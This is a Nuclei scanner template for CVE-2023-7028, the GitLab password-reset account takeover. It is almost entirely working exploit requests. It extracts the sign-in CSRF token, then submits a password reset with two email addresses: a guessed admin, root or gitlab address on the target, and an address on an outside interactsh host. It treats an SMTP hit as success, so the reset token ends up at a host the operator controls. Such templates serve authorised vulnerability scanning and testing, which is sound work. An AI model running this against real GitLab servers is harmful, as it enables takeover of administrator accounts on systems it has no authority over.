71 lines
2.2 KiB
YAML
71 lines
2.2 KiB
YAML
id: CVE-2023-7028
|
|
|
|
info:
|
|
name: GitLab - Account Takeover via Password Reset
|
|
author: DhiyaneshDk,rootxharsh,iamnooob,pdresearch
|
|
severity: critical
|
|
description: |
|
|
An issue has been discovered in GitLab CE/EE affecting all versions from 16.1 prior to 16.1.6, 16.2 prior to 16.2.9, 16.3 prior to 16.3.7, 16.4 prior to 16.4.5, 16.5 prior to 16.5.6, 16.6 prior to 16.6.4, and 16.7 prior to 16.7.2 in which user account password reset emails could be delivered to an unverified email address.
|
|
reference:
|
|
- https://about.gitlab.com/releases/2024/01/11/critical-security-release-gitlab-16-7-2-released/
|
|
- https://x.com/rwincey/status/1745659710089437368?s=20
|
|
- https://gitlab.com/gitlab-org/gitlab/-/issues/436084
|
|
- https://hackerone.com/reports/2293343
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:N
|
|
cvss-score: 10
|
|
cve-id: CVE-2023-7028
|
|
cwe-id: CWE-284
|
|
metadata:
|
|
verified: true
|
|
max-request: 6
|
|
vendor: gitlab
|
|
product: gitlab
|
|
shodan-query: title:"Gitlab"
|
|
tags: hackerone,cve,cve2023,gitlab,auth-bypass,intrusive
|
|
|
|
flow: http(1) && http(2)
|
|
|
|
http:
|
|
- raw:
|
|
- |
|
|
GET /users/sign_in HTTP/1.1
|
|
Host: {{Hostname}}
|
|
|
|
extractors:
|
|
- type: regex
|
|
name: token
|
|
group: 1
|
|
regex:
|
|
- name="authenticity_token" value="([A-Za-z0-9_-]+)"
|
|
internal: true
|
|
|
|
- raw:
|
|
- |
|
|
@timeout: 20s
|
|
POST /users/password HTTP/1.1
|
|
Host: {{Hostname}}
|
|
Origin: {{RootURL}}
|
|
Content-Type: application/x-www-form-urlencoded
|
|
Referer: {{RootURL}}/users/password/new
|
|
|
|
authenticity_token={{token}}&user[email][]={{username}}&user[email][]={{rand_base(6)}}@{{interactsh-url}}
|
|
|
|
payloads:
|
|
username:
|
|
- admin@example.com
|
|
- admin@{{RDN}}
|
|
- root@{{RDN}}
|
|
- gitlab@{{RDN}}
|
|
- git@{{RDN}}
|
|
|
|
matchers:
|
|
- type: dsl
|
|
dsl:
|
|
- contains(interactsh_protocol, 'smtp')
|
|
|
|
extractors:
|
|
- type: dsl
|
|
dsl:
|
|
- username
|
|
# digest: 4a0a004730450220463aa8f8060e3d37f8935e48c8c505f27a93a54e94298dfab55d23119670cb3c022100949c049141cf1a84318d7a48bddd617e314733ec8e6cabf27b140c8396816d9f:922c64590222798bb761d5b6d8e72950 |